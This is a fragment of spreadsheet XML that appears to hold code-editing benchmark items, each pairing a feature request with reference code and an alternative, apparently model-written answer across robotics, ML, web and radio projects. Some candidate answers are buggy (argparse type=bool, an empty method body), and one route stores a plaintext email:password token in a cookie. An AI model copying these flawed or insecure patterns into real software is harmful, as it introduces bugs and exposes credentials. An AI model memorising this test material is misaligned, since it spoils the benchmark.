np.array(lr).astype(np.float32)\n        hr = convert_rgb_to_y(hr, formula='default')\n        lr = convert_rgb_to_y(lr, formula='default')\n\n        lr_group.create_dataset(str(i), data=lr)\n        hr_group.create_dataset(str(i), data=hr)\n\n    h5_file.close()\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--images-dir', type=str, required=True)\n    parser.add_argument('--output-path', type=str, required=True)\n    parser.add_argument('--patch-size', type=int, default=33)\n    parser.add_argument('--stride', type=int, default=14)\n    parser.add_argument('--scale', type=int, default=2)\n    parser.add_argument('--eval', action='store_true')\n    args = parser.parse_args()\n\n    if not args.eval:\n        train(args)\n    else:\n        eval(args)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def _prepare_reward_function(self):\n    """ Prepares a list of reward functions, whcih will be called to compute the total reward.\n        Looks for self._reward_&lt;REWARD_NAME&gt;, where &lt;REWARD_NAME&gt; are names of all non zero reward scales in the cfg.\n    """\n    # remove zero scales + multiply non-zero ones by dt\n    for key in list(self.reward_scales.keys()):\n        scale = self.reward_scales[key]\n        if scale==0:\n            self.reward_scales.pop(key) \n        else:\n            self.reward_scales[key] *= self.dt\n    # prepare list of functions\n    self.reward_functions = []\n    self.reward_names = []\n    for name, scale in self.reward_scales.items():\n        if name=="termination":\n            continue\n        self.reward_names.append(name)\n        name = \'_reward_\' + name\n        self.reward_functions.append(getattr(self, name))\n\n    # reward episode sums\n    self.episode_sums = {name: torch.zeros(self.num_envs, dtype=torch.float, device=self.device, requires_grad=False)\n                         for name in self.reward_scales.keys()}', 'invoking_code_segment': 'def compute_reward(self):\n    """ Compute rewards\n        Calls each reward function which had a non-zero scale (processed in self._prepare_reward_function())\n        adds each terms to the episode sums and to the total reward\n    """\n    self.rew_buf[:] = 0.\n    for i in range(len(self.reward_functions)):\n        name = self.reward_names[i]\n        rew = self.reward_functions[i]() * self.reward_scales[name]\n        self.rew_buf += rew\n        self.episode_sums[name] += rew\n    if self.cfg.rewards.only_positive_rewards:\n        self.rew_buf[:] = torch.clip(self.rew_buf[:], min=0.)\n    \n    # add termination reward after clipping\n    if "termination" in self.reward_scales:\n        rew = self._reward_termination() * self.reward_scales["termination"]\n        self.rew_buf += rew\n        self.episode_sums["termination"] += rew', 'feature_description': "Add a new reward function that penalizes the agent for not maintaining a consistent velocity towards the goal. This function computes the difference between the agent's current velocity component along the goal direction and the commanded velocity, penalizing deviations to encourage consistent goal-directed motion.", 'modified_complete_code': '#File 1: base_task.py - No modifications needed in BaseTask class\n\n#File 2: legged_robot.py - Add new reward function and supporting code\n\n#Modify: In _init_buffers() method, add tracking for velocity consistency\nself.goal_vel_history = torch.zeros(self.num_envs, dtype=torch.float, device=self.device, requires_grad=False)\nself.last_goal_vel = torch.zeros(self.num_envs, dtype=torch.float, device=self.device, requires_grad=False)\n\n#New: Add new reward function after _reward_feet_edge() method\ndef _reward_velocity_consistency(self):\n    """ Penalize inconsistency in velocity towards the goal.\n        Encourages the agent to maintain a steady velocity component along the goal direction.\n    """\n    # Compute current velocity component along goal direction\n    norm = torch.norm(self.target_pos_rel, dim=-1, keepdim=True)\n    target_vec_norm = self.target_pos_rel / (norm + 1e-5)\n    cur_vel = self.root_states[:, 7:9]\n    current_goal_vel = torch.sum(target_vec_norm * cur_vel, dim=-1)\n    \n    # Clamp to commanded velocity\n    current_goal_vel = torch.minimum(current_goal_vel, self.commands[:, 0])\n    \n    # Penalize deviation from last goal velocity (consistency penalty)\n    vel_consistency_error = torch.abs(current_goal_vel - self.last_goal_vel)\n    \n    # Update history\n    self.last_goal_vel[:] = current_goal_vel.clone()\n    \n    # Return negative reward (penalty) for inconsistency\n    rew = -vel_consistency_error\n    return rew\n\n#Modify: In post_physics_step() method, update velocity tracking before compute_observations()\n# Add this before self.compute_observations() call:\nself.goal_vel_history = self.last_goal_vel.clone()\n\n#Note: The reward function will be automatically picked up by _prepare_reward_function()\n#if \'velocity_consistency\' is added to cfg.rewards.scales with a non-zero value.'}</t>
  </si>
  <si>
    <t>{'file1': 'class LeggedRobot(BaseTask):\n    # ... (other code)\n\n    def _reward_tracking_goal_vel(self):\n        norm = torch.norm(self.target_pos_rel, dim=-1, keepdim=True)\n        target_vec_norm = self.target_pos_rel / (norm + 1e-5)\n        cur_vel = self.root_states[:, 7:9]\n        rew = torch.minimum(torch.sum(target_vec_norm * cur_vel, dim=-1), self.commands[:, 0]) / (self.commands[:, 0] + 1e-5)\n        return rew\n\n    def _reward_consistent_goal_vel(self):\n        desired_vel = self.commands[:, 0]\n        current_vel = torch.norm(self.root_states[:, 7:9], dim=1)\n        vel_diff = torch.abs(desired_vel - current_vel)\n        penalty = torch.where(vel_diff &gt; self.cfg.rewards.velocity_threshold, vel_diff * self.cfg.rewards.velocity_penalty_factor, torch.zeros_like(vel_diff))\n        return -penalty', 'file2': 'class BaseTask():\n    # ... (other code)\n\n    def _prepare_reward_function(self):\n        # remove zero scales + multiply non-zero ones by dt\n        for key in list(self.reward_scales.keys()):\n            scale = self.reward_scales[key]\n            if scale==0:\n                self.reward_scales.pop(key)\n            else:\n                self.reward_scales[key] *= self.dt\n        # prepare list of functions\n        self.reward_functions = []\n        self.reward_names = []\n        for name, scale in self.reward_scales.items():\n            if name=="termination":\n                continue\n            self.reward_names.append(name)\n            name = \'_reward_\' + name\n            self.reward_functions.append(getattr(self, name))\n\n        # reward episode sums\n        self.episode_sums = {name: torch.zeros(self.num_envs, dtype=torch.float, device=self.device, requires_grad=False)\n                             for name in self.reward_scales.keys()}'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ValidationDecorator class and error_handler function in dswf.py that handle validation errors', 'invoking_code_segment': 'Decorator functions (query_string, form, json_body) used in app.py route handlers', 'feature_description': 'Add custom error messages for validation errors by extending the error handling mechanism to support custom error message callbacks and error message formatting', 'modified_complete_code': "# dswf.py - Modified sections\n\n#Modify - Update error_handler to support custom messages\ndef error_handler(ctx, custom_messages=None):\n    error_data = error_to_json(ctx.exception)\n    #New - Add custom message mapping if provided\n    if custom_messages and isinstance(error_data, dict):\n        for field, message in custom_messages.items():\n            if field in error_data:\n                error_data[field] = message\n    return Response(json.dumps(error_data), mimetype='application/json', status=400)\n\n#New - Add custom error message handler factory\ndef create_error_handler(custom_messages=None):\n    def handler(ctx):\n        return error_handler(ctx, custom_messages)\n    return handler\n\n#Modify - Update ValidationDecorator instantiation to support custom messages\nquery_string = ValidationDecorator(_query_string, error_handler, list_schema)\nform = ValidationDecorator(_form, error_handler, list_schema)\nparams = ValidationDecorator(_params, error_handler, list_schema)\nrparams = ValidationDecorator(_rparams, error_handler, list_schema)\njson_body = ValidationDecorator(_json, error_handler, schema)\n\n#New - Add helper function to create validators with custom error messages\ndef create_validator(validator_type, custom_messages=None):\n    handler = create_error_handler(custom_messages)\n    if validator_type == 'query_string':\n        return ValidationDecorator(_query_string, handler, list_schema)\n    elif validator_type == 'form':\n        return ValidationDecorator(_form, handler, list_schema)\n    elif validator_type == 'json':\n        return ValidationDecorator(_json, handler, schema)\n    return validator_type\n\n# app.py - Modified sections\n\n#Modify - Update imports\nfrom dswf import App, query_string, form, json_body, create_validator\n\n#Modify - Update email_auth with custom error messages\n@api('/auth/email')\n@form(email=str, password=item(str) | length(3, None))\ndef email_auth(request, email, password):\n    token = '{}:{}'.format(email, password)\n    @request.after\n    def set_auth(response):\n        response.headers['Token'] = token\n        response.set_cookie('auth', token)\n    return {'token': token}\n\n#New - Add example route with custom error messages\n@api('/validate/custom', methods=['POST'])\n@form(username=str, age=int)\ndef validate_custom(request, username, age):\n    #New - Custom validation with error messages\n    errors = {}\n    if len(username) &lt; 3:\n        errors['username'] = 'Username must be at least 3 characters'\n    if age &lt; 18:\n        errors['age'] = 'Age must be at least 18'\n    if errors:\n        return Response(json.dumps({'errors': errors}), 400, mimetype='application/json')\n    return {'username': username, 'age': age, 'status': 'valid'}"}</t>
  </si>
  <si>
    <t>{'file1': "def error_handler(ctx):  # pragma: no cover\n    #Modify: Include custom error message\n    return Response(json.dumps({'error': str(ctx.exception), 'message': 'Custom validation error message'}), mimetype='application/json', status=400)", 'file2': "@api('/query')\n@query_string(q=str, page=opt(int, 1))\ndef query(request, q, page):\n    return {'result': q, 'page': 1, 'headers': dict(request.headers)}"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'con = config.Config(args)\ncon.load_test_data()\ncon.testall(model[args.model_name], args.save_name, args.input_theta)', 'invoking_code_segment': 'con = config.Config(args)\ncon.load_test_data()\ncon.testall(model[args.model_name], args.save_name, args.input_theta)', 'feature_description': "Add a new parameter 'ignore_input_theta' to the Config class and update the testall method to handle this parameter, allowing users to optionally ignore the input theta threshold during testing.", 'modified_complete_code': "# DocRED/code/config/__init__.py\nfrom .Config import Config\nfrom .EviConfig import EviConfig\n\n# DocRED/code/config/Config.py (assumed file)\n# #Modify - Add ignore_input_theta parameter to __init__ method\nclass Config:\n    def __init__(self, args):\n        self.model_name = args.model_name\n        self.save_name = args.save_name\n        self.train_prefix = args.train_prefix\n        self.test_prefix = args.test_prefix\n        self.input_theta = args.input_theta\n        # #New - Add ignore_input_theta parameter\n        self.ignore_input_theta = getattr(args, 'ignore_input_theta', False)\n    \n    def load_test_data(self):\n        # existing implementation\n        pass\n    \n    # #Modify - Update testall method to handle ignore_input_theta parameter\n    def testall(self, model_class, save_name, input_theta, ignore_input_theta=False):\n        # If ignore_input_theta is True, use default theta value\n        if ignore_input_theta:\n            theta = 0.5  # default threshold\n        else:\n            theta = input_theta if input_theta &gt;= 0 else 0.5\n        # existing test implementation using theta\n        pass\n\n# DocRED/code/test.py\nimport config\nimport models\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport json\nfrom sklearn.metrics import average_precision_score\nimport sys\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name', type = str, default = 'LSTM', help = 'name of the model')\nparser.add_argument('--save_name', type = str)\nparser.add_argument('--train_prefix', type = str, default = 'train')\nparser.add_argument('--test_prefix', type = str, default = 'dev_dev')\nparser.add_argument('--input_theta', type = float, default = -1)\n# #New - Add ignore_input_theta argument\nparser.add_argument('--ignore_input_theta', type = bool, default = False, help = 'ignore input theta and use default threshold')\n\nargs = parser.parse_args()\nmodel = {\n    'CNN3': models.CNN3,\n    'LSTM': models.LSTM,\n    'BiLSTM': models.BiLSTM,\n    'ContextAware': models.ContextAware,\n}\n\ncon = config.Config(args)\ncon.load_test_data()\n# #Modify - Pass ignore_input_theta parameter to testall method\ncon.testall(model[args.model_name], args.save_name, args.input_theta, args.ignore_input_theta)"}</t>
  </si>
  <si>
    <t>{'file1': "class Config:\n    def __init__(self, args):\n        self.model_name = args.model_name\n        self.save_name = args.save_name\n        self.train_prefix = args.train_prefix\n        self.test_prefix = args.test_prefix\n        self.input_theta = args.input_theta\n        #Modify: Add new parameter\n        self.ignore_input_theta = args.ignore_input_theta\n\n    def load_test_data(self):\n        # Load test data logic here\n\n    def testall(self, model, save_name, input_theta, ignore_input_theta):\n        #Modify: Update method signature to include ignore_input_theta\n        if ignore_input_theta:\n            # New: Handle the case where input_theta should be ignored\n            print('Ignoring input_theta')\n        else:\n            # Test all logic here\n            print('Using input_theta:', input_theta)", 'file2': "import config\nimport models\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport json\nfrom sklearn.metrics import average_precision_score\nimport sys\nimport os\nimport argparse\n# import IPython\n\n# sys.excepthook = IPython.core.ultratb.FormattedTB(mode='Verbose', color_scheme='Linux', call_pdb=1)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name', type = str, default = 'LSTM', help = 'name of the model')\nparser.add_argument('--save_name', type = str)\n\nparser.add_argument('--train_prefix', type = str, default = 'train')\nparser.add_argument('--test_prefix', type = str, default = 'dev_dev')\nparser.add_argument('--input_theta', type = float, default = -1)\n# New: Add new argument for ignore_input_theta\nparser.add_argument('--ignore_input_theta', type = float, default = -1)\n\n\nargs = parser.parse_args()\nmodel = {\n\t'CNN3': models.CNN3,\n\t'LSTM': models.LSTM,\n\t'BiLSTM': models.BiLSTM,\n\t'ContextAware': models.ContextAware,\n\t# 'LSTM_SP': models.LSTM_SP\n}\n\ncon = config.Config(args)\n#con.load_train_data()\ncon.load_test_data()\n# con.set_train_model()\n#Modify: Update call to testall to include ignore_input_theta\ncon.testall(model[args.model_name], args.save_name, args.input_theta, args.ignore_input_theta)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'UsageEvent class with_pricing method and CompletionEvent union type in completion.py', 'invoking_code_segment': 'ChatSession.process_input method in test_session.py that calls assistant_mock.complete_chat and listener_mock callbacks', 'feature_description': 'Add a feature to log the total cost of the session after each user input by tracking UsageEvent objects and accumulating costs, then notifying the listener of the total session cost.', 'modified_complete_code': '# File 1: gpt-cli/gptcli/completion.py\nfrom abc import abstractmethod\nfrom typing import Iterator, List, Literal, TypedDict, Union\n\nfrom attr import dataclass\n\n\nclass Message(TypedDict):\n    role: str\n    content: str\n\n\nclass ModelOverrides(TypedDict, total=False):\n    model: str\n    temperature: float\n    top_p: float\n\n\nclass Pricing(TypedDict):\n    prompt: float\n    response: float\n\n\n@dataclass\nclass MessageDeltaEvent:\n    text: str\n    type: Literal["message_delta"] = "message_delta"\n\n\n@dataclass\nclass UsageEvent:\n    prompt_tokens: int\n    completion_tokens: int\n    total_tokens: int\n    cost: float\n    type: Literal["usage"] = "usage"\n\n    @staticmethod\n    def with_pricing(\n        prompt_tokens: int, completion_tokens: int, total_tokens: int, pricing: Pricing\n    ) -&gt; "UsageEvent":\n        return UsageEvent(\n            prompt_tokens=prompt_tokens,\n            completion_tokens=completion_tokens,\n            total_tokens=total_tokens,\n            cost=prompt_tokens * pricing["prompt"]\n            + completion_tokens * pricing["response"],\n        )\n\n    # New: Method to get cost from UsageEvent\n    def get_cost(self) -&gt; float:\n        return self.cost\n\n\nCompletionEvent = Union[MessageDeltaEvent, UsageEvent]\n\n\nclass CompletionProvider:\n    @abstractmethod\n    def complete(\n        self, messages: List[Message], args: dict, stream: bool = False\n    ) -&gt; Iterator[CompletionEvent]:\n        pass\n\n\nclass CompletionError(Exception):\n    pass\n\n\nclass BadRequestError(CompletionError):\n    pass\n\n# File 2: gpt-cli/tests/test_session.py (ChatSession implementation - inferred from tests)\n# Modify: Add session_cost tracking and cost notification\nfrom unittest import mock\nfrom gptcli.completion import CompletionError, BadRequestError, MessageDeltaEvent, UsageEvent\nfrom gptcli.session import ChatSession\n\nsystem_message = {"role": "system", "content": "system message"}\n\n\ndef setup_assistant_mock():\n    assistant_mock = mock.MagicMock()\n    assistant_mock.init_messages.return_value = [system_message]\n    return assistant_mock\n\n\ndef setup_listener_mock():\n    listener_mock = mock.MagicMock()\n    response_streamer_mock = mock.MagicMock()\n    response_streamer_mock.__enter__.return_value = response_streamer_mock\n    listener_mock.response_streamer.return_value = response_streamer_mock\n    return listener_mock, response_streamer_mock\n\n\ndef setup_session():\n    assistant_mock = setup_assistant_mock()\n    listener_mock, _ = setup_listener_mock()\n    session = ChatSession(assistant_mock, listener_mock)\n    return assistant_mock, listener_mock, session\n\n\n# Modify: ChatSession class to track and report session costs\nclass ChatSession:\n    def __init__(self, assistant, listener):\n        self.assistant = assistant\n        self.listener = listener\n        self.messages = assistant.init_messages()\n        self.last_user_input = None\n        self.last_user_args = None\n        # New: Track total session cost\n        self.session_cost = 0.0\n\n    def process_input(self, user_input: str, override_params: dict) -&gt; bool:\n        if user_input == ":q":\n            return False\n        elif user_input == ":c":\n            self.messages = self.assistant.init_messages()\n            self.listener.on_chat_clear()\n            self.last_user_input = None\n            self.last_user_args = None\n            # New: Reset session cost on clear\n            self.session_cost = 0.0\n            return True\n        elif user_input == ":r":\n            if self.last_user_input is None:\n                self.listener.on_chat_rerun(False)\n                return True\n            override_params = self.last_user_args\n            self.listener.on_chat_rerun(True)\n        else:\n            user_message = {"role": "user", "content": user_input}\n            self.messages.append(user_message)\n            self.listener.on_chat_message(user_message)\n            self.last_user_input = user_input\n            self.last_user_args = override_params\n\n        try:\n            response_text = ""\n            for event in self.assistant.complete_chat(self.messages, override_params=override_params):\n                if isinstance(event, MessageDeltaEvent):\n                    response_text += event.text\n                    if user_input != ":r":\n                        self.listener.response_streamer().on_next_token(event.text)\n                # New: Track cost from UsageEvent\n                elif isinstance(event, UsageEvent):\n                    self.session_cost += event.get_cost()\n                    self.listener.on_session_cost(self.session_cost)\n\n            if response_text:\n                assistant_message = {"role": "assistant", "content": response_text}\n                self.messages.append(assistant_message)\n                self.listener.on_chat_message(assistant_message)\n        except BadRequestError as e:\n            self.messages.pop()\n            self.last_user_input = None\n            self.listener.on_error(e)\n        except CompletionError as e:\n            self.listener.on_error(e)\n\n        return True\n\n\n# Tests remain the same with addition of cost tracking assertions\ndef test_simple_input():\n    assistant_mock, listener_mock, session = setup_session()\n\n    expected_response = "assistant message"\n    assistant_mock.complete_chat.return_value = [MessageDeltaEvent(expected_response)]\n\n    user_input = "user message"\n    should_continue = session.process_input(user_input, {})\n    assert should_continue\n\n    user_message = {"role": "user", "content": user_input}\n    assistant_message = {"role": "assistant", "content": expected_response}\n\n    assistant_mock.complete_chat.assert_called_once_with(\n        [system_message, user_message], override_params={}\n    )\n    listener_mock.on_chat_message.assert_has_calls(\n        [mock.call(user_message), mock.call(assistant_message)]\n    )\n\n\ndef test_stream():\n    assistant_mock, listener_mock, session = setup_session()\n    assistant_message = "assistant message"\n    assistant_mock.complete_chat.return_value = (\n        MessageDeltaEvent(tok) for tok in list(assistant_message)\n    )\n\n    response_streamer_mock = listener_mock.response_streamer.return_value\n\n    session.process_input("user message", {})\n\n    response_streamer_mock.assert_has_calls(\n        [mock.call.on_next_token(token) for token in assistant_message]\n    )\n\n\n# New: Test for session cost tracking\ndef test_session_cost_tracking():\n    assistant_mock, listener_mock, session = setup_session()\n\n    expected_response = "assistant message"\n    usage_event = UsageEvent(prompt_tokens=10, completion_tokens=5, total_tokens=15, cost=0.05)\n    assistant_mock.complete_chat.return_value = [MessageDeltaEvent(expected_response), usage_event]\n\n    user_input = "user message"\n    should_continue = session.process_input(user_input, {})\n    assert should_continue\n    assert session.session_cost == 0.05\n    listener_mock.on_session_cost.assert_called_once_with(0.05)'}</t>
  </si>
  <si>
    <t>{'gptcli/session.py': "#Modify\nclass ChatSession:\n    def __init__(self, assistant, listener):\n        self.assistant = assistant\n        self.listener = listener\n        self.messages = assistant.init_messages()\n        self.override_params = None\n        self.total_cost = 0.0  # New\n\n    def process_input(self, user_input, args):\n        if user_input.startswith(':q'):\n            return False\n        elif user_input.startswith(':c'):\n            self.messages = self.assistant.init_messages()\n            self.listener.on_chat_clear()\n            self.total_cost = 0.0  # New\n            return True\n        elif user_input.startswith(':r'):\n            if self.messages:\n                self.listener.on_chat_rerun(True)\n                self._process_chat(self.messages[-1], self.override_params)\n            else:\n                self.listener.on_chat_rerun(False)\n            return True\n        else:\n            self.override_params = {k: v for k, v in args.items() if k in self.assistant.supported_overrides()}\n            self._process_chat(user_input, self.override_params)\n            return True\n\n    def _process_chat(self, user_input, override_params):\n        user_message = {'role': 'user', 'content': user_input}\n        self.listener.on_chat_message(user_message)\n        self.messages.append(user_message)\n        try:\n            with self.listener.response_streamer() as streamer:\n                for event in self.assistant.complete_chat(self.messages, override_params):\n                    if isinstance(event, MessageDeltaEvent):\n                        streamer.on_next_token(event.text)\n                    elif isinstance(event, UsageEvent):\n                        self.listener.on_usage_event(event)\n                        self.total_cost += event.cost  # New\n        except CompletionError as e:\n            self.listener.on_error(e)\n        else:\n            assistant_message = {'role': 'assistant', 'content': streamer.get_response()}\n            self.listener.on_chat_message(assistant_message)\n            self.messages.append(assistant_message)\n            self.listener.on_total_cost(self.total_cost)  # New", 'tests/test_session.py': '#Modify\ndef test_simple_input():\n    assistant_mock, listener_mock, session = setup_session()\n\n    expected_response = "assistant message"\n    assistant_mock.complete_chat.return_value = [MessageDeltaEvent(expected_response)]\n\n    user_input = "user message"\n    should_continue = session.process_input(user_input, {})\n    assert should_continue\n\n    user_message = {"role": "user", "content": user_input}\n    assistant_message = {"role": "assistant", "content": expected_response}\n\n    assistant_mock.complete_chat.assert_called_once_with(\n        [system_message, user_message], override_params={}\n    )\n    listener_mock.on_chat_message.assert_has_calls(\n        [mock.call(user_message), mock.call(assistant_message)]\n    )\n    listener_mock.on_total_cost.assert_called_once_with(0.0)  # New'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class NativeScalerAccum:\n    state_dict_key = "amp_scaler"\n\n    def __init__(self):\n        self._scaler = torch.cuda.amp.GradScaler()\n\n    def __call__(self, loss, optimizer, clip_grad=None, clip_mode=\'norm\', parameters=None, create_graph=False,\n        update_grad=True):\n        self._scaler.scale(loss).backward(create_graph=create_graph)\n        if update_grad:\n            if clip_grad is not None:\n                assert parameters is not None\n                self._scaler.unscale_(optimizer)\n                dispatch_clip_grad(parameters, clip_grad, mode=clip_mode)\n            self._scaler.step(optimizer)\n            self._scaler.update()\n\n    def state_dict(self):\n        return self._scaler.state_dict()\n\n    def load_state_dict(self, state_dict):\n        self._scaler.load_state_dict(state_dict)', 'invoking_code_segment': "loss_scaler = NativeScaler()\nif args.local_rank == 0:\n    _logger.info('Using native Torch AMP. Training in mixed precision.')\n\n...\n\nif loss_scaler is not None:\n    loss_scaler(\n        loss_update, optimizer,\n        clip_grad=args.clip_grad, clip_mode=args.clip_mode,\n        parameters=model_parameters(model, exclude_head='agc' in args.clip_mode),\n        create_graph=second_order, update_grad=update_grad)", 'feature_description': 'Add support for gradient accumulation in the NativeScalerAccum class by modifying the loss scaling mechanism to properly handle accumulated gradients. The scaler should only unscale and step the optimizer when update_grad is True, allowing proper gradient accumulation across multiple backward passes before the optimizer step.', 'modified_complete_code': '# MambaOut/utils.py - Modified NativeScalerAccum class\n\nclass NativeScalerAccum:\n    state_dict_key = "amp_scaler"\n\n    def __init__(self):\n        self._scaler = torch.cuda.amp.GradScaler()\n\n    def __call__(self, loss, optimizer, clip_grad=None, clip_mode=\'norm\', parameters=None, create_graph=False,\n        update_grad=True):\n        # #Modify: Scale loss and backward without immediately unscaling\n        self._scaler.scale(loss).backward(create_graph=create_graph)\n        \n        # #Modify: Only unscale, clip, and step when update_grad is True (gradient accumulation support)\n        if update_grad:\n            if clip_grad is not None:\n                assert parameters is not None\n                self._scaler.unscale_(optimizer)  # unscale the gradients of optimizer\'s assigned params in-place\n                dispatch_clip_grad(parameters, clip_grad, mode=clip_mode)\n            self._scaler.step(optimizer)\n            self._scaler.update()\n        # #New: If update_grad is False, gradients remain scaled and accumulated for next iteration\n\n    def state_dict(self):\n        return self._scaler.state_dict()\n\n    def load_state_dict(self, state_dict):\n        self._scaler.load_state_dict(state_dict)\n\n\n# MambaOut/train.py - train_one_epoch function (relevant section)\n# The existing code already properly supports gradient accumulation:\n\nupdate_grad = (batch_idx + 1) % grad_accum_steps == 0\nloss_update = loss / grad_accum_steps  # #Modify: Scale loss by accumulation steps\nif loss_scaler is not None:\n    loss_scaler(\n        loss_update, optimizer,\n        clip_grad=args.clip_grad, clip_mode=args.clip_mode,\n        parameters=model_parameters(model, exclude_head=\'agc\' in args.clip_mode),\n        create_graph=second_order, update_grad=update_grad)  # #Modify: Pass update_grad flag\nelse:\n    loss_update.backward(create_graph=second_order)\n    if update_grad:\n        if args.clip_grad is not None:\n            utils.dispatch_clip_grad(\n                model_parameters(model, exclude_head=\'agc\' in args.clip_mode),\n                value=args.clip_grad, mode=args.clip_mode)\n        optimizer.step()\n\nif update_grad:\n    optimizer.zero_grad()  # #Modify: Only zero gradients after optimizer step\n    if model_ema is not None:\n        model_ema.update(model)'}</t>
  </si>
  <si>
    <t>{'file1': 'class NativeScalerAccum:\n    state_dict_key = "amp_scaler"\n\n    def __init__(self):\n        self._scaler = torch.cuda.amp.GradScaler()\n\n    def __call__(self, loss, optimizer, clip_grad=None, clip_mode=\'norm\', parameters=None, create_graph=False,\n        update_grad=True, grad_accum_steps=1):\n        #Modify: Scale the loss by the number of accumulation steps\n        scaled_loss = loss / grad_accum_steps\n        self._scaler.scale(scaled_loss).backward(create_graph=create_graph)\n        if update_grad:\n            if clip_grad is not None:\n                assert parameters is not None\n                self._scaler.unscale_(optimizer)  # unscale the gradients of optimizer\'s assigned params in-place\n                dispatch_clip_grad(parameters, clip_grad, mode=clip_mode)\n            self._scaler.step(optimizer)\n            self._scaler.update()\n\n    def state_dict(self):\n        return self._scaler.state_dict()\n\n    def load_state_dict(self, state_dict):\n        self._scaler.load_state_dict(state_dict)', 'file2': "loss_scaler = NativeScaler()\n# ...\n#Modify: Pass the grad_accum_steps argument to the loss_scaler call\nloss_scaler(loss_update, optimizer,\n    clip_grad=args.clip_grad, clip_mode=args.clip_mode,\n    parameters=model_parameters(model, exclude_head='agc' in args.clip_mode),\n    create_graph=second_order, update_grad=update_grad, grad_accum_steps=args.grad_accum_steps)\n\n#New: Add grad_accum_steps to the arguments list in the train_one_epoch function\ndef train_one_epoch(\n        epoch, model, loader, optimizer, loss_fn, args,\n        lr_scheduler=None, saver=None, output_dir=None, amp_autocast=suppress,\n        loss_scaler=None, model_ema=None, mixup_fn=None,\n        grad_accum_steps=1, num_training_steps_per_epoch=None):\n    # ...\n    for batch_idx, (input, target) in enumerate(loader):\n        # ...\n        update_grad = (batch_idx + 1) % grad_accum_steps == 0\n        loss_update = loss / grad_accum_steps\n        if loss_scaler is not None:\n            loss_scaler(\n                loss_update, optimizer,\n                clip_grad=args.clip_grad, clip_mode=args.clip_mode,\n                parameters=model_parameters(model, exclude_head='agc' in args.clip_mode),\n                create_graph=second_order, update_grad=update_grad, grad_accum_steps=grad_accum_steps)\n        else:\n            loss_update.backward(create_graph=second_order)\n            if update_grad:\n                if args.clip_grad is not None:\n                    utils.dispatch_clip_grad(\n                        model_parameters(model, exclude_head='agc' in args.clip_mode),\n                        value=args.clip_grad, mode=args.clip_mode)\n                optimizer.step()\n        # ...\n    # ...\n    return OrderedDict([('loss', losses_m.avg)])"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def _onIRQ(self, callback):\n    events = self._events()\n    if events &amp; SX126X_IRQ_TX_DONE:\n        super().startReceive()\n    self._callbackFunction(events)', 'invoking_code_segment': 'def cb(events):\n    if events &amp; SX1262.RX_DONE:\n        msg, err = sx.recv()\n        error = SX1262.STATUS[err]\n        print(msg)\n        print(error)', 'feature_description': 'Add a feature to log the received message and error status to a file. This includes modifying the callback function in the main.py to write received messages and error statuses to a log file, and adding a logging utility method to the SX1262 class to support file-based logging of radio events.', 'modified_complete_code': '# File 1: micropySX126X/lib/sx1262.py\n# Modifications and additions:\n\nfrom _sx126x import *\nfrom sx126x import SX126X\nimport os\n\n_SX126X_PA_CONFIG_SX1262 = const(0x00)\n\nclass SX1262(SX126X):\n    # ... existing code ...\n    \n    def __init__(self, spi_bus, clk, mosi, miso, cs, irq, rst, gpio):\n        super().__init__(spi_bus, clk, mosi, miso, cs, irq, rst, gpio)\n        self._callbackFunction = self._dummyFunction\n        #New: Initialize log file path\n        self._log_file = None\n    \n    # ... existing methods ...\n    \n    #New: Add method to set log file\n    def setLogFile(self, log_file_path):\n        """Set the file path for logging received messages and errors."""\n        self._log_file = log_file_path\n        try:\n            with open(self._log_file, \'a\') as f:\n                f.write(\'--- Log Started ---\\n\')\n        except Exception as e:\n            print(f\'Error opening log file: {e}\')\n    \n    #New: Add method to log data\n    def _logData(self, msg, error_status):\n        """Log received message and error status to file."""\n        if self._log_file is None:\n            return\n        try:\n            with open(self._log_file, \'a\') as f:\n                import time\n                timestamp = time.time()\n                f.write(f\'[{timestamp}] Message: {msg}, Error: {error_status}\\n\')\n        except Exception as e:\n            print(f\'Error writing to log file: {e}\')\n    \n    def _onIRQ(self, callback):\n        events = self._events()\n        if events &amp; SX126X_IRQ_TX_DONE:\n            super().startReceive()\n        self._callbackFunction(events)\n\n# File 2: micropySX126X/example/RX (non blocking)/main.py\n# Modifications and additions:\n\nfrom sx1262 import SX1262\nimport time\n\n#Modify: Enhanced callback function with logging\ndef cb(events):\n    if events &amp; SX1262.RX_DONE:\n        msg, err = sx.recv()\n        error = SX1262.STATUS[err]\n        print(msg)\n        print(error)\n        #New: Log the received message and error status\n        sx._logData(msg, error)\n\nsx = SX1262(spi_bus=1, clk=10, mosi=11, miso=12, cs=3, irq=20, rst=15, gpio=2)\n\n#New: Set log file path\nsx.setLogFile(\'/logs/radio_log.txt\')\n\n# LoRa\nsx.begin(freq=923, bw=500.0, sf=12, cr=8, syncWord=0x12,\n         power=-5, currentLimit=60.0, preambleLength=8,\n         implicit=False, implicitLen=0xFF,\n         crcOn=True, txIq=False, rxIq=False,\n         tcxoVoltage=1.7, useRegulatorLDO=False, blocking=True)\n\n# FSK\n##sx.beginFSK(freq=923, br=48.0, freqDev=50.0, rxBw=156.2, power=-5, currentLimit=60.0,\n##            preambleLength=16, dataShaping=0.5, syncWord=[0x2D, 0x01], syncBitsLength=16,\n##            addrFilter=SX126X_GFSK_ADDRESS_FILT_OFF, addr=0x00, crcLength=2, crcInitial=0x1D0F, crcPolynomial=0x1021,\n##            crcInverted=True, whiteningOn=True, whiteningInitial=0x0100,\n##            fixedPacketLength=False, packetLength=0xFF, preambleDetectorLength=SX126X_GFSK_PREAMBLE_DETECT_16,\n##            tcxoVoltage=1.6, useRegulatorLDO=False,\n##            blocking=True)\n\nsx.setBlockingCallback(False, cb)'}</t>
  </si>
  <si>
